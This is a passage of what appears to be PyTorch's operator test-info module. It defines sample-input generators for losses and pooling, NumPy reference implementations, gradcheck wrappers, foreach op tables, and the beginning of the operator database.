_make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(_make_tensor(()), args=(_make_tensor(()), )) def error_inputs_hinge_embedding_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') def reference_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp = make_input((10, )) inp[2] = float('nan') target = make_input((10, )) # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Inf Handling inp = make_input((10, )) inp[4] = float('inf') target = make_input((10, )) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Broadcasting inp = make_input((5, 5)) target = make_input((1, 5)) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) def sample_inputs_huber_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): d['delta'] = random.uniform(1e-3, 9) yield SampleInput(input, args=(target, ), kwargs=d) def sample_inputs_poisson_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for li in (True, False): for f in (True, False): i1 = _make_tensor(s) i2 = _make_tensor(s) # For Poisson NLL Loss, # target is assumed to be from # Poisson Distribution which # always has positive samples t1 = _make_tensor(s, low=0) t2 = _make_tensor(s, low=0) if not li: i1.abs_() i2.abs_() t1.abs_() t2.abs_() yield ( i1, t1, dict(log_input=li, full=f, reduction=r) ) yield ( i2, t2, dict(log_input=li, full=f, eps=random.uniform(1e-8, 1e-3), reduction=r) ) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, ), kwargs=kwargs) def sample_inputs_triplet_margin_loss(op_info, device, dtype, requires_grad, with_distance=False, **kwargs): make = partial(make_tensor, (S, M), device=device, dtype=dtype, requires_grad=requires_grad) kwargss = ( *[dict(margin=margin) for margin in (1e-6, 1.0, 10.0)], dict(swap=True), *[dict(reduction=reduction) for reduction in ("mean", "sum", "none")], ) for kwargs in kwargss: input = make() args = (make(), make()) if with_distance: kwargs["distance_function"] = torch.nn.PairwiseDistance() yield SampleInput(input, args=args, kwargs=kwargs) def sample_inputs_pairwise_distance(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shape = (3,) batched_shape = (2, *shape) shapes_and_kwargs = [ (shape, None), (batched_shape, None), (shape, dict(keepdim=True)), (batched_shape, 
dict(keepdim=True)), (shape, dict(p=5.0)), (shape, dict(p=-1.0)), (shape, dict(eps=1.0)), ] return [ SampleInput(make(shape), args=(make(shape),), kwargs=kwargs) for shape, kwargs in shapes_and_kwargs ] def sample_inputs_pixel_shuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 9, 2, 2), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(upscale_factor=upscale_factor), ) for upscale_factor in (1, 3) ] def sample_inputs_pixel_unshuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 1, 6, 6), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(downscale_factor=downscale_factor), ) for downscale_factor in (1, 3) ] def sample_inputs_binary_cross_entropy(op_info, device, dtype, requires_grad, logits=False, **kwargs): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)))) for reduction in reductions], ] if logits: shapes_and_kwargs.extend( [((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions] ) for shape, kwargs in shapes_and_kwargs: yield SampleInput( (make if logits else make_prob)(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_allclose(op_info, device, dtype, requires_grad, **kwargs): samples = [] sample_shapes = [(), (S), (S, S, S)] atols = [1e-2, 1e-16] rtols = [1e-1, 0.5] eps = 1e-8 for s, rtol, atol in product(sample_shapes, rtols, atols): # close sample t = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) close = (t + atol).detach().requires_grad_(requires_grad) close_sample = SampleInput(t, args=(close,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(close_sample) # random sample a = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) b = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) r_sample = SampleInput(a, args=(b,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(r_sample) return samples def sample_inputs_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) # In addition to the regular test cases, we add two for mixed floating point and complex inputs if dtype.is_complex: make = partial(make_tensor, (), device=device, requires_grad=requires_grad) yield SampleInput(make(dtype=dtype), args=(make(dtype=torch.double),)) yield SampleInput(make(dtype=torch.double), args=(make(dtype=dtype),)) def sample_inputs_smooth_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) make = partial(make_tensor, (S, S), device=device, dtype=dtype, requires_grad=requires_grad) # This test case always triggers the smooth condition, since absolute difference of input and target # is smaller than beta yield SampleInput(make(low=0, high=2), args=(make(low=-2, high=0),), kwargs=dict(beta=5)) yield SampleInput(make(), args=(make(),), kwargs=dict(beta=0)) def sample_inputs_kl_div(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes_and_reduction = [ ((2,), 
"mean"), ((2, 3), "mean"), ((2, 3, 4), "mean"), ((2,), "none"), ((2,), "batchmean"), ((2,), "sum"), ] sample_inputs = [] for (shape, reduction), log_target in itertools.product(shapes_and_reduction, (True, False)): # input should be log-probability, i.e. lie in (-inf, 0] input = make(shape, low=None, high=0) # target should be a probability by default, i.e. lie in [0, 1], and a log-probability if log_target is set, # i.e. lie in (-inf, 0] target = make(shape, low=None, high=0) if log_target else make(shape, low=0, high=1) sample_inputs.append( SampleInput(input, args=(target,), kwargs=dict(reduction=reduction, log_target=log_target)) ) return sample_inputs def sample_inputs_pdist(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield from (SampleInput(make_input((n, m))) for n, m in itertools.product((1, S), repeat=2)) yield from (SampleInput(make_input((S, S)), kwargs=dict(p=p)) for p in (0.0, 1.0, 2.0, 10.0, float("inf"))) def reference_pdist(input, p=2): pdist = scipy.spatial.distance.pdist if p == 0: output = pdist(input, "hamming") * input.shape[1] elif p == float("inf"): output = pdist(input, lambda x, y: np.abs(x - y).max()) else: output = pdist(input, "minkowski", p=p) return output.astype(input.dtype) def sample_inputs_diagflat(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(())), SampleInput(make_input((2,))), SampleInput(make_input((2, 2))), SampleInput(make_input((2,)), kwargs=dict(offset=1)), SampleInput(make_input((2,)), kwargs=dict(offset=-1)), ] def sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): unpool_name_to_pool_method_dict = { 'nn.functional.max_unpool1d': torch.nn.functional.max_pool1d, 'nn.functional.max_unpool2d': torch.nn.functional.max_pool2d, 'nn.functional.max_unpool3d': torch.nn.functional.max_pool3d } unpool_name_to_dim = { 'nn.functional.max_unpool1d': 1, 'nn.functional.max_unpool2d': 2, 'nn.functional.max_unpool3d': 3 } unpool_to_pool_name_dict = dict(( (k, f'nn.functional.{v.__name__}') for k, v in unpool_name_to_pool_method_dict.items() )) pool_dim = unpool_name_to_dim[op_info.name] pool_method = unpool_name_to_pool_method_dict[op_info.name] pool_op_info = copy.copy(op_info) pool_op_info.name = unpool_to_pool_name_dict[op_info.name] for sample in sample_inputs_max_pool(pool_op_info, device, dtype, requires_grad, **kwargs): # shapes (C, ...) 
do not work as of now, # see https://github.com/pytorch/pytorch/issues/68337 # TODO: remove once the issue is resolved if sample.input.dim() != pool_dim + 2: continue # No dilation > 1 for max_unpool, # see https://github.com/pytorch/pytorch/issues/68420 if sample.kwargs['dilation'] != 1: continue # Can't unpool without indices if sample.kwargs['return_indices']: pool, indices = pool_method(sample.input, **sample.kwargs) # arg has to be a leaf arg = pool.detach().requires_grad_(requires_grad) sample_kwargs = { 'kernel_size': sample.kwargs['kernel_size'], 'stride': sample.kwargs['stride'], 'padding': sample.kwargs['padding'], # output_size could be None but we specify it explicitly # to compensate for the information loss in pool due # to the floor/ceil operation used to compute the shapes 'output_size': sample.input.size() } yield SampleInput(arg, args=(indices,), kwargs=sample_kwargs) def sample_inputs_max_unpool_grad(op_info, device, dtype, requires_grad, **kwargs): for sample in sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): indices = sample.args[0] # The samples for max_unpool are generated with max_pool. # It could be that a single element from the max_pool's # input is mapped to several locations in its output. # This situation leads to failed gradchecks because # the finite difference algorithm perturbs the elements # of the output one by one, and not in classes of # equivalences determined by whether two elements # in the output are coming from the same location in the # input (simply put, they have the same corresponding index). # So, there are two ways to resolve this issue: # 1. Extract a perturbation for one element and apply it to all # the elements from the same equivalence class, or # 2. Make sure that the equivalence classes are all singletons, # i.e. the index tensor has to be comprised of only unique # indices. # Here we go with solution 2, the easiest of all.
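# A concrete illustration of the duplicated-index case being filtered out
# (a hand-worked sketch; overlapping windows pick input element 1 twice):
# >>> x = torch.tensor([[[1., 5., 1., 1.]]])
# >>> _, idx = F.max_pool1d(x, kernel_size=2, stride=1, return_indices=True)
# >>> idx
# tensor([[[1, 1, 2]]])
# >>> idx.unique().numel() == idx.numel()
# False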
if indices.unique().numel() == indices.numel(): yield sample foreach_unary_op_db: List[OpInfo] = [ ForeachFuncInfo('exp'), ForeachFuncInfo('acos'), ForeachFuncInfo('asin'), ForeachFuncInfo('atan'), ForeachFuncInfo('cos'), ForeachFuncInfo('cosh'), ForeachFuncInfo('log'), ForeachFuncInfo('log10'), ForeachFuncInfo('log2'), ForeachFuncInfo('tan'), ForeachFuncInfo('tanh'), ForeachFuncInfo('sin'), ForeachFuncInfo('sinh'), ForeachFuncInfo( 'neg', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex(), sample_inputs_func=sample_inputs_foreach, ), ForeachFuncInfo( 'sqrt', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), ), ForeachFuncInfo( 'ceil', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erf', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erfc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'expm1', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'floor', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'log1p', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'round', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'frac', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'reciprocal', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'sigmoid', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'trunc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'abs', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), ] foreach_binary_op_db: List[OpInfo] = [ ForeachFuncInfo( "add", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "sub", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "mul", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ForeachFuncInfo( "div", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), 
"TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ] foreach_pointwise_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "addcmul", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( "addcdiv", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ] foreach_minmax_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "maximum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ForeachFuncInfo( "minimum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ] foreach_reduce_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "norm", dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), ), ] def reference_sign(x): if x.dtype == np.bool_: # `np.sign` doesn't support `bool`. # >>> np.sign(True) # ufunc 'sign' did not contain a loop # with signature matching types dtype('bool') -> dtype('bool') return np.sign(x, dtype=np.uint8).astype(np.bool_) return np.sign(x) def reference_sgn(x): # NumPy doesn't have an equivalent to `torch.sgn` when the dtype is complex. # For complex inputs, `np.sign` returns sign(x.real) + 0j if x.real != 0 else sign(x.imag) + 0j. # while `torch.sgn` returns, 0 if abs(input) == 0 else input/abs(input) if x.dtype not in [np.complex64, np.complex128]: return reference_sign(x) out = (x / np.abs(x)) if out.ndim == 0: # Handle x == 0 case if (x == 0): # Can't assign to np.complex object # So make a new one. return np.array(complex(0, 0), dtype=x.dtype) return out # Handle x == 0 case mask = (x == 0) out[mask] = complex(0, 0) return out def reference_sigmoid(x): # 'scipy.special.expit' not supported for the input types if x.dtype in [np.complex64, np.complex128]: return (1 / (1 + np.exp(-x))) return scipy.special.expit(x) def reference_logsigmoid(x): return np.where( x < 0, x - np.log1p(np.exp(x)), -np.log1p(np.exp(-x))) def reference_hardsigmoid(x): intermediate = x / 6 + 0.5 y = np.clip(intermediate, 0, None) return np.where(y > 1, 1, y).astype(x.dtype) def reference_lgamma(x): # scipy.special.gammaln returns `-inf` when input is `-inf`. # While Pytorch, C and C++, all return `inf` when input is `-inf`. # Reference: # https://en.cppreference.com/w/cpp/numeric/math/lgamma # https://en.cppreference.com/w/c/numeric/math/lgamma # To handle the above discrepancy, # we replace -inf with inf so values # that were originally -inf map to inf as expected if x.dtype.kind == 'f': x = np.where(x == float('-inf'), np.array(float('inf'), dtype=x.dtype), x) out = scipy.special.gammaln(x) if x.dtype == np.float16: # `scipy.special.gammaln` returns output of float32 when input is float16, # while `torch.lgamma` preserves `float16`. But due to smaller range of float16, # Pytorch version outputs `inf` while SciPy returns finite values. 
out = out.astype(np.float16) return out def reference_polygamma(x, n): # WEIRD `scipy.special.polygamma` behavior # >>> scipy.special.polygamma(0, np.array(501, dtype=np.float32)).dtype # dtype('float64') # >>> scipy.special.polygamma(0, np.array([501], dtype=np.float32)).dtype # dtype('float32') # # Thus we cast output to the default torch dtype or preserve double result_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if x.dtype == np.double: result_dtype = np.double return scipy.special.polygamma(n, x).astype(result_dtype) def reference_mvlgamma(x, d): if x.dtype == np.float16: return scipy.special.multigammaln(x, d).astype(np.float16) return scipy.special.multigammaln(x, d) def reference_softplus(input, beta=1, threshold=20): non_linear = input * beta <= threshold output = input.copy() output[non_linear] = np.log(1 + np.exp(beta * input[non_linear])) / beta return output def reference_gelu(X, *, approximate='none'): def _gelu_ref(X): return X * stats.norm.cdf(X) def _tanh_gelu_ref(X): M_SQRT_2_PI = math.sqrt(2 / math.pi) Z = M_SQRT_2_PI * (X + 0.044715 * np.power(X, 3.0)) return 0.5 * X * (1.0 + np.tanh(Z)) if approximate == 'tanh': return _tanh_gelu_ref(X) else: return _gelu_ref(X) def reference_one_hot(a: np.ndarray, num_classes: int = -1) -> np.ndarray: if num_classes == -1: num_classes = int(np.amax(a) + 1) idcs = a.reshape(-1) + np.arange(0, a.size, dtype=np.int64) * num_classes one_hot = np.zeros((a.size, num_classes), dtype=a.dtype) np.put(one_hot, idcs, 1) return one_hot.reshape(*a.shape, -1) def reference_mse_loss(input, target, reduction="mean"): se = (input - target) ** 2 if reduction == "mean": return np.mean(se) elif reduction == "sum": return np.sum(se) else: # reduction == "none" return se def wrapper_set_seed(op, *args, **kwargs): """Wrapper to set seed manually for some functions like dropout See: https://github.com/pytorch/pytorch/pull/62315#issuecomment-896143189 for more details. """ with freeze_rng_state(): torch.manual_seed(42) return op(*args, **kwargs) def reference_layer_norm(inp: np.ndarray, normalized_shape: Tuple[int], weight=None, bias=None, eps=1e-5): feature_size = np.prod(normalized_shape) inp_view = inp.reshape(-1, feature_size) # type: ignore[call-overload] mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) if weight is None and bias is not None: Y = Y + bias.reshape(-1) elif weight is not None and bias is None: Y = Y * weight.reshape(-1) elif weight is not None and bias is not None: Y = Y * weight.reshape(-1) + bias.reshape(-1) return Y.reshape(*inp.shape) def reference_group_norm(inp: np.ndarray, num_groups: int, weight=None, bias=None, eps=1e-5): inp_view = inp if np.prod(inp.shape) != 0: inp_view = inp.reshape((inp.shape[0], num_groups, -1)) mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) Y = Y.reshape(inp.shape) if weight is not None: # weight is a vector of length equal to the channel if len(Y.shape) > 2: weight = np.tile(np.expand_dims(weight, 1), [1] + list(inp.shape[2:])) Y = Y * weight if bias is not None: # bias is a vector of length equal to the channel if len(Y.shape) > 2: bias = np.tile(np.expand_dims(bias, 1), [1] + list(inp.shape[2:])) Y = Y + bias return Y # using a custom reference function since numpy only has a string side arg (instead of right and side) and doesn't # have an out_int32 arg. 
Additionally, numpy doesn't support searchsorted with ND arrays, so this splits those into # stacked 1D cases def reference_searchsorted(sorted_sequence, boundary, out_int32=False, right=False, side='left', sorter=None): side = 'right' if (right or side == 'right') else 'left' if len(sorted_sequence.shape) == 1: ret = np.searchsorted(sorted_sequence, boundary, side=side, sorter=sorter) return ret.astype(np.int32) if out_int32 else ret elif sorted_sequence.shape[0] == 0: if sorter is not None: sorter = sorter.flatten() ret = np.searchsorted(sorted_sequence.flatten(), boundary.flatten(), side=side, sorter=sorter) ret = ret.astype(np.int32) if out_int32 else ret return ret.reshape(boundary.shape) else: # numpy searchsorted only supports 1D inputs so we split up ND inputs orig_shape = boundary.shape num_splits = np.prod(sorted_sequence.shape[:-1]) splits = range(0, num_splits) sorted_sequence, boundary = sorted_sequence.reshape(num_splits, -1), boundary.reshape(num_splits, -1) if sorter is not None: sorter = sorter.reshape(num_splits, -1) split_sequence = [sorted_sequence[i] for i in splits] split_boundary = [boundary[i] for i in splits] split_sorter = [sorter[i] if (sorter is not None) else None for i in splits] split_ret = [np.searchsorted(s_seq, b, side=side, sorter=s_sort) for (s_seq, b, s_sort) in zip(split_sequence, split_boundary, split_sorter)] split_ret = [i.astype(np.int32) for i in split_ret] if out_int32 else split_ret return np.stack(split_ret).reshape(orig_shape) def gradcheck_wrapper_hermitian_input(op, input, *args, **kwargs): """Gradcheck wrapper for functions that take Hermitian matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the Hermitian property of the input. """ return op(input + input.mH, *args, **kwargs) def gradcheck_wrapper_triangular_input(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower or upper triangular matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the triangular property of the input. `idx` is used to specify which `args[idx]` is to be triangularized. """ triangular_arg = args[idx].triu() if upper else args[idx].tril() return op(*args[:idx], triangular_arg, *args[idx + 1:], upper, **kwargs) def gradcheck_wrapper_triangular_input_real_positive_diagonal(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower/upper triangular matrices with real and positive diagonals, for example, cholesky-like operations. """ arg = args[idx] arg_diag = arg.diagonal(0, -2, -1) arg_diag_embed = torch.diag_embed(arg_diag) id_diag_tensor = torch.ones_like(arg_diag) id_tensor = torch.diag_embed(id_diag_tensor) # new_arg = arg - diag(arg) + I new_arg = arg - arg_diag_embed + id_tensor return gradcheck_wrapper_triangular_input( op, *args[:idx], new_arg, *args[idx + 1:], upper=upper, idx=idx, **kwargs ) def gradcheck_wrapper_masked_operation(op, input, *args, **kwargs): """Gradcheck wrapper for masked operations. When mask is specified, replaces masked-out elements with zeros. Use for operations that produce non-finite masked-out elements, for instance, for minimum and maximum reductions.
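As an illustration, a floating-point amax reduction over a fully masked-out
slice yields a non-finite identity value (e.g. -inf); finite differencing
cannot handle such entries, so zeroing them keeps gradcheck well-defined
without affecting the gradient at unmasked positions.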
""" output = op(input, *args, **kwargs) mask = kwargs.get('mask') if mask is not None: output_mask = torch._masked._output_mask(op, input, *args, **kwargs) output = torch.where(output_mask, output, output.new_zeros([])) return output def reference_reduction_numpy(f, supports_keepdims=True): """Wraps a NumPy reduction operator. The wrapper function will forward dim, keepdim, mask, and identity kwargs to the wrapped function as the NumPy equivalent axis, keepdims, where, and initiak kwargs, respectively. Args: f: NumPy reduction operator to wrap supports_keepdims (bool, optional): Whether the NumPy operator accepts keepdims parameter. If it does not, the wrapper will manually unsqueeze the reduced dimensions if it was called with keepdim=True. Defaults to True. Returns: Wrapped function """ @wraps(f) def wrapper(x: np.ndarray, *args, **kwargs): # Copy keys into a set keys = set(kwargs.keys()) dim = kwargs.pop('dim', None) keepdim = kwargs.pop('keepdim', False) if 'dim' in keys: dim = tuple(dim) if isinstance(dim, Sequence) else dim # NumPy reductions don't accept dim=0 for scalar inputs # so we convert it to None if and only if dim is equivalent if x.ndim == 0 and dim in {0, -1, (0,), (-1,)}: kwargs['axis'] = None else: kwargs['axis'] = dim if 'keepdim' in keys and supports_keepdims: kwargs['keepdims'] = keepdim if 'mask' in keys: mask = kwargs.pop('mask') if mask is not None: assert mask.layout == torch.strided kwargs['where'] = mask.cpu().numpy() if 'identity' in keys: identity = kwargs.pop('identity') if identity is not None: if identity.dtype is torch.bfloat16: identity = identity.cpu().to(torch.float32) else: identity = identity.cpu() kwargs['initial'] = identity.numpy() if 'unbiased' in keys: unbiased = kwargs.pop('unbiased') if unbiased is not None: kwargs['ddof'] = int(unbiased) result = f(x, *args, **kwargs) # Unsqueeze reduced dimensions if NumPy does not support keepdims if keepdim and not supports_keepdims and x.ndim > 0: dim = list(range(x.ndim)) if dim is None else dim result = np.expand_dims(result, dim) return result return wrapper def loss_reference_reduction_wrapper(fn): def wrapper(input, target, *, size_average=None, reduce=None, reduction="mean", **other_kwargs): if size_average is not None or reduce is not None: raise RuntimeError( "The keyword arguments 'size_average' and 'reduce' are deprecated and not supported by this wrapper" ) output = fn(input, target, **other_kwargs) if reduction == "mean": return np.mean(output) elif reduction == "sum": return np.sum(output) else: # reduction == "none" return output return wrapper @loss_reference_reduction_wrapper def reference_smooth_l1_loss(input, target, beta=1.0): diff = input - target abs_diff = np.abs(diff) above_threshold = abs_diff >= beta loss = np.empty_like(input) loss[above_threshold] = abs_diff[above_threshold] - 0.5 * beta loss[~above_threshold] = diff[~above_threshold] ** 2 / (2 * beta) return loss def reference_std_var(f): """Forwards unbiased/correction kwargs as NumPy's equivalent ddof""" g = reference_reduction_numpy(f) @wraps(g) def wrapper(x: np.ndarray, *args, **kwargs): assert not ('unbiased' in kwargs and 'correction' in kwargs) if 'unbiased' in kwargs: kwargs['ddof'] = int(kwargs.pop('unbiased')) elif 'correction' in kwargs: kwargs['ddof'] = kwargs.pop('correction') return g(x, *args, **kwargs) return wrapper def generate_std_var_kwargs(t: torch.Tensor, **kwargs): """Generates unbiased/correction kwargs for std/var operators""" yield ((), {'unbiased': True}) yield ((), {'unbiased': False}) # Currently, 
calling std with correction is only enabled when # both dim and keepdim are provided. if 'dim' in kwargs and 'keepdim' in kwargs: yield ((), {'correction': 0}) yield ((), {'correction': 1}) numel = torch.tensor(t.shape)[kwargs.get('dim')].prod() yield ((), {'correction': numel // 2}) def error_inputs_mean(op_info, device, **kwargs): err_msg1 = (r"mean\(\): could not infer output dtype. " r"Input dtype must be either a floating point or complex dtype. " r"Got: Long") si1 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],)) err_msg2 = (r"mean\(\): could not infer output dtype. " r"Optional dtype must be either a floating point or complex dtype. " r"Got: Long") si2 = SampleInput( make_tensor((3, 4, 5), dtype=torch.float32, device=device), args=([],), kwargs={"dtype": torch.int64}) err_msg3 = "Expected out tensor to have dtype double, but got float instead" si3 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],), kwargs={ "dtype": torch.float64, "out": make_tensor([], dtype=torch.float32, device=device), }) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2), ErrorInput(si3, error_regex=err_msg3)) # Operator database (sorted alphabetically) op_db: List[OpInfo] = [ UnaryUfuncInfo('abs', aliases=('absolute', ), ref=np.abs, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Inplace abs doesn't support complex inputs DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_grad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_gradgrad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=(torch.cdouble,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat]), # Reference: https://github.com/pytorch/pytorch/issues/49224 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.int8], active_if=TEST_WITH_ASAN), # TODO: Fix test_out_arg_all_dtypes as torch.empty_like(expected_output) where expected_output=op(input) # We can break the logic of the loop over all possible types but it is OK. 
